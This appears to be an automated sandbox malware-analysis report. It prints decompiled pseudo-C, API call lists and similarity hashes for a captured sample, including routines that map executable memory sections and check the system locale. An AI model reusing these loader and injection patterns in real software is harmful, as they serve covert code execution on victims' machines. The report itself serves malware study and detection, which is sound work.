      				intOrPtr _v544;
      				intOrPtr _v552;
      				void _v724;
      				char _v728;
      				long _t39;
      				long _t47;
      				intOrPtr _t54;
      				void* _t55;
      				intOrPtr* _t57;
      				void* _t59;
      				intOrPtr* _t60;
      				intOrPtr _t61;
      				intOrPtr* _t62;
      				void* _t66;
      
      				_t62 = __esi;
      				_t59 = __edx;
      				_t55 = __ecx;
      				_t60 = __eax;
      				_v728 = 0;
      				memset( &_v724, 0, 0x2c8);
      				_t66 =  *((intOrPtr*)(_t60 + 8)) -  *0x405478; // 0x950
      				if(_t66 == 0) {
      					_push( *((intOrPtr*)(__esi + 0x10)));
      					if( *((intOrPtr*)(__esi + 8))() == 0) {
      						goto L13;
      					} else {
      						_v8 = 0;
      						goto L12;
      					}
      				} else {
      					_v728 = 0x10003;
      					_t54 = E004027AD(_t55,  *_t60);
      					if(_t54 == 0) {
      						L13:
      						_v8 = GetLastError();
      					} else {
      						_t39 = E00402749( *((intOrPtr*)(_t60 + 4)),  &_v728);
      						_v8 = _t39;
      						if(_t39 != 0) {
      							L12:
      							if(_v8 == 0xffffffff) {
      								goto L13;
      							}
      						} else {
      							 *(__esi + 4) =  *(__esi + 4) & 0x00000000;
      							 *__esi = _v544;
      							_t11 = _t54 + 0x218; // 0x218
      							_v544 = _t11;
      							_t13 = _t62 + 0x218; // 0x218
      							_v552 = _t54;
      							memcpy(_t13, E00402E72, 0x100);
      							_t16 = _t62 + 0x18; // 0x18
      							asm("cdq");
      							if( *((intOrPtr*)(__esi + 0x10)) == _t16 &&  *((intOrPtr*)(__esi + 0x14)) == _t59) {
      								asm("adc ecx, ecx");
      								 *((intOrPtr*)(__esi + 0x10)) = _t54 + 0x18;
      								 *((intOrPtr*)(__esi + 0x14)) = 0;
      							}
      							if(E0040276A( *_t60, _t54, _t62,  &_v12) != 0) {
      								_t57 =  *0x405020;
      								_t61 =  *((intOrPtr*)(_t60 + 4));
      								_t47 = 0x7f;
      								if(_t57 != 0) {
      									_t47 = RtlNtStatusToDosError( *_t57(_t61,  &_v728));
      								}
      								_v8 = _t47;
      								goto L12;
      							}
      						}
      					}
      				}
      				return _v8;
      			}

      APIs
      • memset.NTDLL ref: 0040230E
      • GetLastError.KERNEL32(?,00000318,00000008), ref: 004023FC
        • Part of subcall function 004027AD: RtlNtStatusToDosError.NTDLL ref: 004027E5
        • Part of subcall function 004027AD: SetLastError.KERNEL32(00000000,?,?,?,00402336), ref: 004027EC
        • Part of subcall function 00402749: RtlNtStatusToDosError.NTDLL ref: 00402761
      • memcpy.NTDLL(00000218,00402E72,00000100,?,00010003,?,?,00000318,00000008), ref: 00402389
        • Part of subcall function 0040276A: RtlNtStatusToDosError.NTDLL ref: 0040279A
        • Part of subcall function 0040276A: SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004027A1
      • RtlNtStatusToDosError.NTDLL ref: 004023DE
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Error$Status$Last$memcpymemset
      • String ID:
      • API String ID: 945571674-0
      • Opcode ID: 46aab8090885b1306568bc0e3a50fcd583e001d471627f99c5e4f67a0e146dd5
      • Instruction ID: 3fae51a11c54e36db90388124414a18734d07815fba89533a23882a26d2618ce
      • Opcode Fuzzy Hash: 46aab8090885b1306568bc0e3a50fcd583e001d471627f99c5e4f67a0e146dd5
      • Instruction Fuzzy Hash: 29314D71900209AFDB20DF64DE89AABB7B8FB14304F10457AEA55F32D0D7B8AE449B54
      C-Code - Quality: 50%
      			E0040192F(intOrPtr _a4, void** _a8, void* _a12) {
      				int _v12;
      				void* _v20;
      				void* _v24;
      				int _v28;
      				int _v32;
      				long _v36;
      				int _v40;
      				int _v44;
      				void* _v48;
      				long _t29;
      				long _t33;
      				long _t37;
      				intOrPtr* _t41;
      				long _t45;
      
      				asm("stosd");
      				asm("stosd");
      				asm("stosd");
      				asm("stosd");
      				asm("stosd");
      				_t41 = _a12;
      				asm("stosd");
      				_v24 = _a4;
      				_t29 = 0x40;
      				_v36 = _t29;
      				_a12 = 0;
      				_v12 = 0;
      				_v48 = 0x18;
      				_v44 = 0;
      				_v40 = 0;
      				_v32 = 0;
      				_v28 = 0;
      				_t33 = NtCreateSection( &_a12, 0xf001f,  &_v48,  &_v24, _t29, 0x8000000, 0); // executed
      				if(_t33 < 0) {
      					_t45 = RtlNtStatusToDosError(_t33);
      				} else {
      					_t37 = E004018F0(_a12, 0xffffffff,  &_v12); // executed
      					_t45 = _t37;
      					if(_t45 == 0) {
      						memset(_v12, 0, _v24);
      						 *_a8 = _v12;
      						if(_t41 != 0) {
      							 *_t41 = _a12;
      						}
      					}
      				}
      				if(_a12 != 0 && _t41 == 0) {
      					__imp__ZwClose(_a12);
      				}
      				return _t45;
      			}

      APIs
      • NtCreateSection.NTDLL ref: 0040198A
      • memset.NTDLL ref: 004019AF
      • RtlNtStatusToDosError.NTDLL ref: 004019CB
      • ZwClose.NTDLL(?), ref: 004019DF
        • Part of subcall function 004018F0: NtMapViewOfSection.NTDLL ref: 0040191D
        • Part of subcall function 004018F0: RtlNtStatusToDosError.NTDLL ref: 00401924
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ErrorSectionStatus$CloseCreateViewmemset
      • String ID:
      • API String ID: 783833395-0
      • Opcode ID: 3470e663a032d0fb28d1b07b2d0cc5175860c4adeb9457b3b6a1b023d2b0b21c
      • Instruction ID: b3f3f0f65fb182f986cc8b1f5d3f5f7cdff5de093414296d106791a2da9f84a1
      • Opcode Fuzzy Hash: 3470e663a032d0fb28d1b07b2d0cc5175860c4adeb9457b3b6a1b023d2b0b21c
      • Instruction Fuzzy Hash: 022119B1910219AFCB01DF99CC459EFBBB9FB48750F100526FA11F3290D7749A14CBA5
      C-Code - Quality: 58%
      			E0040270C(void* __ecx) {
      				char _v8;
      				signed short _t7;
      
      				_v8 = _v8 & 0x00000000;
      				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
      				if(_t7 == 0) {
      					__imp__GetSystemDefaultUILanguage();
      					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
      				}
      				return _v8;
      			}

      APIs
      • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178), ref: 00402721
      • GetSystemDefaultUILanguage.KERNEL32(?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178,?,00000000), ref: 0040272B
      • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178), ref: 0040273E
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Language$DefaultInfoLocaleNameSystem
      • String ID:
      • API String ID: 3724080410-0
      • Opcode ID: 79bb996a1244ea49f035fa6c35332c3dbe9be2932c968e9445b8b55f278922c5
      • Instruction ID: a10d21f4cbecd40ab08141ec1fba7a2319f1a9bb39c31be18bf90b3c037b49a9
      • Opcode Fuzzy Hash: 79bb996a1244ea49f035fa6c35332c3dbe9be2932c968e9445b8b55f278922c5
      • Instruction Fuzzy Hash: 78E0B8A4640205B6E700D7919D0AF79726CA75074AF504155FB41F70D0D7B49E05A669
      APIs
        • Part of subcall function 002D43CF: lstrlen.KERNEL32(?,00000000,?,00000000,002D1C4F,?,00000000,?,00000000,?,?,002D1DB8), ref: 002D43D8
        • Part of subcall function 002D43CF: mbstowcs.NTDLL ref: 002D43FF
        • Part of subcall function 002D43CF: memset.NTDLL ref: 002D4411
      • GetSystemTimeAsFileTime.KERNEL32(?,002D1DB8,00000000,?,00000000,?,00000000,?,?,002D1DB8), ref: 002D1C72
        • Part of subcall function 002D26CC: SafeArrayCreate.OLEAUT32(00000011,00000001,002DCA98), ref: 002D26F4
        • Part of subcall function 002D26CC: memcpy.NTDLL(?,002D1C97,00000008), ref: 002D270E
        • Part of subcall function 002D26CC: SafeArrayDestroy.OLEAUT32(002D1DB8), ref: 002D273A
      • HeapFree.KERNEL32(00000000,00000000,002D1DB8), ref: 002D1CA2
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ArraySafeTime$CreateDestroyFileFreeHeapSystemlstrlenmbstowcsmemcpymemset
      • String ID:
      • API String ID: 214104239-0
      • Opcode ID: f6947ae6ec23b489af8bde9a562181f19e5a8db486050d26a59ebad35c1aaedb
      • Instruction ID: 5171cd1b5e1a57782009cf5efdf183ed99867567235871ae786e6992490580e4
      • Opcode Fuzzy Hash: f6947ae6ec23b489af8bde9a562181f19e5a8db486050d26a59ebad35c1aaedb
      • Instruction Fuzzy Hash: A101A732A7020ABBDB216F659C49F5A7BACFB84704F504427FA00962A1EA71DD388751
      C-Code - Quality: 75%
      			E004018F0(void* _a4, void* _a8, PVOID* _a12) {
      				long _v8;
      				void* _v12;
      				void* _v16;
      				long _t12;
      
      				_v16 = 0;
      				asm("stosd");
      				_v8 = 0;
      				_t12 = NtMapViewOfSection(_a4, _a8, _a12, 0, 0,  &_v16,  &_v8, 2, 0, 0x40); // executed
      				return RtlNtStatusToDosError(_t12);
      			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ErrorSectionStatusView
      • String ID:
      • API String ID: 1313840181-0
      • Opcode ID: c0b0cca16c72e3f69227371f17784503288c00ddcddb9ee3d3bdbe3c26c3f45e
      • Instruction ID: d64c79457ae150eb0a106f5442764b7f5bf4f8051d33ed88b86ad0a50613e610
      • Opcode Fuzzy Hash: c0b0cca16c72e3f69227371f17784503288c00ddcddb9ee3d3bdbe3c26c3f45e
      • Instruction Fuzzy Hash: 44E0C0B6910208FFDB059F94DD0ADDF7B7DEB44300F00856AB715A6150E6B0AA189B64
      C-Code - Quality: 100%
      			E004026F0(intOrPtr _a4) {
      				char _v5;
      				signed char _v6;
      				char _v7;
      				signed int _v16;
      				signed short _v20;
      				char _v21;
      				intOrPtr _v28;
      				signed short _v32;
      				intOrPtr _v40;
      				short _v52;
      				short _v56;
      				intOrPtr _v64;
      				signed int _v73;
      				intOrPtr _v80;
      				signed int _v84;
      				short _v92;
      				short _v96;
      				short _v100;
      				intOrPtr _v104;
      				signed int _v108;
      				intOrPtr _v112;
      				signed int _v117;
      				intOrPtr _v124;
      				signed int _v125;
      				signed int _v140;
      				char _v141;
      				signed int _v152;
      				intOrPtr _v156;
      				short _v160;
      				intOrPtr _v164;
      				signed int _v168;
      				intOrPtr _v172;
      				signed short _v180;
      				char _v181;
      				signed int _v188;
      				char _v189;
      				intOrPtr _v196;
      				short _v212;
      				intOrPtr _v220;
      				void* _v224;
      				char _v225;
      				signed int _v236;
      				intOrPtr _v240;
      				signed int _v244;
      				char _t86;
      				intOrPtr _t87;
      				signed int _t93;
      				intOrPtr _t104;
      				intOrPtr _t119;
      				intOrPtr _t135;
      				intOrPtr _t139;
      
      				_v181 = 0x10;
      				_v196 = 0xd;
      				_v104 = 9;
      				_v100 = 8;
      				_v7 = 0x24;
      				_v96 = 0x1e;
      				_v56 = 8;
      				_v160 = 0x1c;
      				_v28 = 0x1b;
      				_v21 = 0x10;
      				if((_v125 & 0x000000ff) == (_v73 & 0x000000ff)) {
      					_t135 =  *0x43605c; // 0x18f052
      					_v160 = _t135 + _v40 +  *0x42d02c + (_v20 & 0x0000ffff);
      					_t119 =  *0x42d038; // 0x18f08b
      					_t139 =  *0x42c00c; // 0xffffd2e0
      					_t17 = _t119 + 0x4f; // 0xffffd32f
      					_v189 = _t139 + _t17 +  *0x42d02c +  *0x42d024;
      				}
      				_t104 =  *0x42d024; // 0x18f01f
      				_v212 = _t104 + 0x6e;
      				_v52 = 0x7d98;
      				 *0x436054 = 0xa -  *0x436058;
      				_v244 = _v84;
      				if(_v244 > 3) {
      					_t86 = (_v125 & 0x000000ff) - (_v117 & 0x000000ff) - 0x23;
      					_v5 = _t86;
      				} else {
      					switch( *((intOrPtr*)(_v244 * 4 +  &M00402940))) {
      						case 0:
      							if( *0x436048 >= 0x61) {
      								_v180 = _v156 + _v168 & _v140 ^ _v236;
      								_v152 = (_v180 & 0x0000ffff) - _v172 & _v188;
      							}
      							goto L13;
      						case 1:
      							__eflags = _v172 -  *0x42d020; // 0x0
      							if(__eflags < 0) {
      								_v225 = __dl;
      								__ecx = _v64;
      								__ecx = _v64 + 0xc;
      								__eflags = __ecx;
      								_v196 = __ecx;
      							}
      							goto L13;
      						case 2:
      							__ecx =  *0x42c014; // 0x536cedcb
      							 *0x42c014 = __ecx;
      							goto L13;
      						case 3:
      							 *0x42c010 = _v117 & 0x000000ff ^ _v16;
      							goto L13;
      					}
      				}
      				L13:
      				_v156 = _v124 - _v240;
      				_t87 =  *0x436048; // 0x0
      				_v80 = _t87 + _v108;
      				_v236 = 0x60;
      				_v56 = _v164 - 0x00000058 | 0x00000037;
      				E004021D0(_a4); // executed
      				_t62 = _v104 - 0x18; // -14
      				_v92 = 0xa - (_v73 & 0x000000ff) + _t62;
      				if( *0x42d034 > 0x3e) {
      					_v117 = _v164 + (_v6 & 0x000000ff) + 0x4e - _v16;
      					_v5 = (_v32 & 0x0000ffff) - _v188 + _v84 + _v80 + _v104;
      				}
      				_v141 = 0xfffffff6 - _v112 + _v168 + _v220;
      				_t93 = _v108 ^  *0x42c008;
      				_v168 = _t93;
      				return _t93;
      			}

      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID: $$`
      • API String ID: 0-2086647760
      • Opcode ID: 567217a8410f8293d50992bb43debc897487006448fc11c66888129cdc5bfe32
      • Instruction ID: 3bcc79275197a5fbd0f01428a3654b0b1095746b4773207dad947f1d2e88e257
      • Opcode Fuzzy Hash: 567217a8410f8293d50992bb43debc897487006448fc11c66888129cdc5bfe32
      • Instruction Fuzzy Hash: C4616B30D04269CFCB24CFA8C994BADBBB1BF45304F1482E9C44867296D7745A8ACF59
      APIs
        • Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C
      • CoCreateInstance.OLE32(002DC028,00000000,00000004,002DC048,00000000), ref: 002D547C
        • Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$AllocateCreateFreeInstance
      • String ID:
      • API String ID: 4220887836-0
      • Opcode ID: b6fed966687865c95757240ca8179fb09b816ab55d86d3842d49a5f2fab1b6c3
      • Instruction ID: a1116b1f3554d892a9fb44a93e77f254cea5e5d82aaf4b45998fef936e0d425e
      • Opcode Fuzzy Hash: b6fed966687865c95757240ca8179fb09b816ab55d86d3842d49a5f2fab1b6c3
      • Instruction Fuzzy Hash: D4218874650615EFC710DF68C849F4A77A8EF4A742F20405AFA05DB380CBB1ED50CBA0

      Control-flow Graph

      APIs
      • GetTickCount.KERNEL32(002DA05C,00000000,00000000), ref: 002D4D30
      • RtlQueryPerformanceFrequency.NTDLL(?), ref: 002D4D81
      • RtlQueryPerformanceCounter.NTDLL(?), ref: 002D4D8B
      • _aulldiv.NTDLL(?,?,?,?), ref: 002D4D9D
      • GetSystemTimeAsFileTime.KERNELBASE(?), ref: 002D4DB7
      • _aulldiv.NTDLL(?,?,00989680,00000000), ref: 002D4DD7
        • Part of subcall function 002D487F: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D489B
        • Part of subcall function 002D487F: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D48B9
      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 002D4E54
      • GetTickCount.KERNELBASE ref: 002D4E65
      • RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4E79
      • RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4E97
        • Part of subcall function 002D4B5A: lstrcat.KERNEL32(00000000,00000001), ref: 002D4BA3
        • Part of subcall function 002D4B5A: StrTrimA.SHLWAPI(00000000,002DA290), ref: 002D4BC0
      • StrTrimA.SHLWAPI(00000000,002DA294), ref: 002D4ECC
        • Part of subcall function 002D4340: lstrcpy.KERNEL32(00000000,/SetBinaryValue), ref: 002D436B
        • Part of subcall function 002D4340: lstrcat.KERNEL32(00000000,?), ref: 002D4376
      • lstrcpy.KERNEL32(?,?), ref: 002D4EEC
        • Part of subcall function 002D43CF: lstrlen.KERNEL32(?,00000000,?,00000000,002D1C4F,?,00000000,?,00000000,?,?,002D1DB8), ref: 002D43D8
        • Part of subcall function 002D43CF: mbstowcs.NTDLL ref: 002D43FF
        • Part of subcall function 002D43CF: memset.NTDLL ref: 002D4411
      • wcstombs.NTDLL ref: 002D4F96
        • Part of subcall function 002D584A: memcpy.NTDLL(00000000,002DA0BC,-00000001,002DA0BC,00000000,00000001,002D4FA8,00000000,00000000,002DA0BC,?,?,?), ref: 002D5902
        • Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021
        • Part of subcall function 002D52D0: SysAllocString.OLEAUT32(?), ref: 002D5311
        • Part of subcall function 002D52D0: SysFreeString.OLEAUT32(?), ref: 002D53E5
        • Part of subcall function 002D52D0: SafeArrayDestroy.OLEAUT32(?), ref: 002D5439
        • Part of subcall function 002D52D0: SysFreeString.OLEAUT32(?), ref: 002D5447
      • HeapFree.KERNEL32(00000000,00000008,?), ref: 002D4FED
        • Part of subcall function 002D482D: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4836
        • Part of subcall function 002D482D: Sleep.KERNEL32(0000000A,?,002D1DF2,00000002,?,?), ref: 002D4840
        • Part of subcall function 002D482D: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4873
        • Part of subcall function 002D5457: CoCreateInstance.OLE32(002DC028,00000000,00000004,002DC048,00000000), ref: 002D547C
      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002D4FFE
      • HeapFree.KERNEL32(00000000,?,00000001), ref: 002D500E
      • HeapFree.KERNEL32(00000000,?), ref: 002D501E
      • HeapFree.KERNEL32(00000000,00000001), ref: 002D502C
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Free$Heap$CriticalSection$EnterLeaveString$CountPerformanceQueryTickTimeTrim_aulldivlstrcatlstrcpy$AllocAllocateArrayCounterCreateDestroyFileFrequencyInstanceSafeSleepSystemlstrlenmbstowcsmemcpymemsetwcstombs
      • String ID: .avi$Fv
      • API String ID: 2775928422-1418298500
      • Opcode ID: 0fc61762241beff132d40e6978e4ca635d34288c210af73e4bf34678889d48b1
      • Instruction ID: b895404018d5968ea8be4db7a484fd220dc434adae645cfdbf0de68c2e602278
      • Opcode Fuzzy Hash: 0fc61762241beff132d40e6978e4ca635d34288c210af73e4bf34678889d48b1
      • Instruction Fuzzy Hash: 2391597191121AEFCB12AFA4EC4CEAE7BB9FF48311B150026F914D7260C7759D20DBA0
      C-Code - Quality: 91%
      			E0040FBFF(void* __ebx) {
      				void* __edi;
      				void* __esi;
      				struct HINSTANCE__* _t3;
      				_Unknown_base(*)()* _t4;
      				void* _t5;
      				_Unknown_base(*)()* _t6;
      				_Unknown_base(*)()* _t7;
      				long _t10;
      				void* _t11;
      				int _t12;
      				void* _t18;
      				intOrPtr _t21;
      				long _t26;
      				void* _t30;
      				struct HINSTANCE__* _t37;
      				void* _t40;
      				void* _t42;
      
      				_t30 = __ebx;
      				_t3 = GetModuleHandleA("KERNEL32.DLL"); // executed
      				_t37 = _t3;
      				if(_t37 != 0) {
      					_t4 = GetProcAddress(_t37, "FlsAlloc"); // executed
      					 *0x436644 = _t4; // executed
      					_t5 = GetProcAddress(_t37, "FlsGetValue"); // executed
      					 *0x436648 = _t5; // executed
      					_t6 = GetProcAddress(_t37, "FlsSetValue"); // executed
      					 *0x43664c = _t6; // executed
      					_t7 = GetProcAddress(_t37, "FlsFree"); // executed
      					__eflags =  *0x436644;
      					_t40 = TlsSetValue;
      					 *0x436650 = _t7;
      					if( *0x436644 == 0) {
      						L6:
      						 *0x436648 = TlsGetValue;
      						 *0x436644 = E0040F91F;
      						 *0x43664c = _t40;
      						 *0x436650 = TlsFree;
      					} else {
      						__eflags =  *0x436648;
      						if( *0x436648 == 0) {
      							goto L6;
      						} else {
      							__eflags =  *0x43664c;
      							if( *0x43664c == 0) {
      								goto L6;
      							} else {
      								__eflags = _t7;
      								if(_t7 == 0) {
      									goto L6;
      								}
      							}
      						}
      					}
      					_t10 = TlsAlloc();
      					__eflags = _t10 - 0xffffffff;
      					 *0x42c494 = _t10;
      					if(_t10 == 0xffffffff) {
      						L15:
      						_t11 = 0;
      						__eflags = 0;
      					} else {
      						_t12 = TlsSetValue(_t10,  *0x436648);
      						__eflags = _t12;
      						if(_t12 == 0) {
      							goto L15;
      						} else {
      							E0040D0AC();
      							 *0x436644 = E0040F850( *0x436644);
      							 *0x436648 = E0040F850( *0x436648);
      							 *0x43664c = E0040F850( *0x43664c);
      							 *0x436650 = E0040F850( *0x436650);
      							_t18 = E0040D2C9();
      							__eflags = _t18;
      							if(_t18 == 0) {
      								L14:
      								E0040F952();
      								goto L15;
      							} else {
      								_push(E0040FADE);
      								_t21 =  *((intOrPtr*)(E0040F8BC( *0x436644)))();
      								__eflags = _t21 - 0xffffffff;
      								 *0x42c490 = _t21;
      								if(_t21 == 0xffffffff) {
      									goto L14;
      								} else {
      									_t42 = E004110D9(1, 0x214);
      									__eflags = _t42;
      									if(_t42 == 0) {
      										goto L14;
      									} else {
      										_push(_t42);
      										_push( *0x42c490);
      										__eflags =  *((intOrPtr*)(E0040F8BC( *0x43664c)))();
      										if(__eflags == 0) {
      											goto L14;
      										} else {
      											_push(0);
      											_push(_t42); // executed
      											E0040F98F(_t30, _t37, _t42, __eflags); // executed
      											_t26 = GetCurrentThreadId();
      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
      											 *_t42 = _t26;
      											_t11 = 1;
      										}
      									}
      								}
      							}
      						}
      					}
      					return _t11;
      				} else {
      					E0040F952();
      					return 0;
      				}
      			}

      APIs
      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0040C91A), ref: 0040FC05
      • GetProcAddress.KERNEL32(00000000,FlsAlloc,?), ref: 0040FC27
      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040FC34
      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040FC41
      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040FC4E
      • TlsAlloc.KERNEL32 ref: 0040FC9E
      • TlsSetValue.KERNEL32(00000000), ref: 0040FCB9
        • Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000000,0040F8BA,00000000,00412290,00000000,00000000,00000314,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F85D
        • Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000004,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F874
        • Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F889
        • Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F899
        • Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F8A7
      • GetCurrentThreadId.KERNEL32 ref: 0040FD68
        • Part of subcall function 0040F952: TlsFree.KERNEL32(0000001A,0040FD7E), ref: 0040F97D
        • Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
        • Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
        • Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
        • Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
        • Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?), ref: 0040F913
        • Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE
        • Part of subcall function 0040F98F: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00418CB8,0000000C,0040FAA1,00000000,00000000), ref: 0040F9A0
        • Part of subcall function 0040F98F: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040F9C9
        • Part of subcall function 0040F98F: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040F9D9
        • Part of subcall function 0040F98F: InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressProc$Value$HandleModule$Pointer$AllocCurrentDecodeEncodeFreeIncrementInterlockedSleepThread
      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
      • API String ID: 2292312579-3819984048
      • Opcode ID: 585ddeddb7b52054c9609b37b0de9c137685ef3b7ec3faa75b0f07d8c7479e08
      • Instruction ID: f4645d5930c4b6cfba22fa347c7c0f035c91bb1ae7631caf77b4e8b584b8dd61
      • Opcode Fuzzy Hash: 585ddeddb7b52054c9609b37b0de9c137685ef3b7ec3faa75b0f07d8c7479e08
      • Instruction Fuzzy Hash: 06319172900702BAD731BF75AC07A563FA1AB05794B22953FE804A26F0EB38D4488F5C
      C-Code - Quality: 87%
      			E0040F98F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
      				struct HINSTANCE__* _t20;
      				intOrPtr _t24;
      				intOrPtr _t28;
      				_Unknown_base(*)()* _t29;
      				_Unknown_base(*)()* _t30;
      				intOrPtr _t38;
      				void* _t39;
      
      				_t31 = __ebx;
      				_push(0xc);
      				_push(0x418cb8);
      				E0040D48C(__ebx, __edi, __esi);
      				_t20 = GetModuleHandleA("KERNEL32.DLL"); // executed
      				 *(_t39 - 0x1c) = _t20;
      				_t38 =  *((intOrPtr*)(_t39 + 8));
      				 *((intOrPtr*)(_t38 + 0x5c)) = 0x42c3e0;
      				 *((intOrPtr*)(_t38 + 0x14)) = 1;
      				if(_t20 != 0) {
      					_t31 = GetProcAddress; // executed
      					_t29 = GetProcAddress(_t20, "EncodePointer"); // executed
      					 *(_t38 + 0x1f8) = _t29;
      					_t30 = GetProcAddress( *(_t39 - 0x1c), "DecodePointer"); // executed
      					 *(_t38 + 0x1fc) = _t30;
      				}
      				 *((intOrPtr*)(_t38 + 0x70)) = 1;
      				 *((char*)(_t38 + 0xc8)) = 0x43;
      				 *((char*)(_t38 + 0x14b)) = 0x43;
      				 *(_t38 + 0x68) = 0x42c4a8;
      				InterlockedIncrement(0x42c4a8);
      				E0040D43F(_t31, 1, 0xc);
      				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
      				_t24 =  *((intOrPtr*)(_t39 + 0xc));
      				 *((intOrPtr*)(_t38 + 0x6c)) = _t24;
      				if(_t24 == 0) {
      					_t28 =  *0x42cab0; // 0x42c9d8
      					 *((intOrPtr*)(_t38 + 0x6c)) = _t28;
      				}
      				_push( *((intOrPtr*)(_t38 + 0x6c)));
      				E00410678();
      				 *(_t39 - 4) = 0xfffffffe;
      				return E0040D4D1(E0040FA3A());
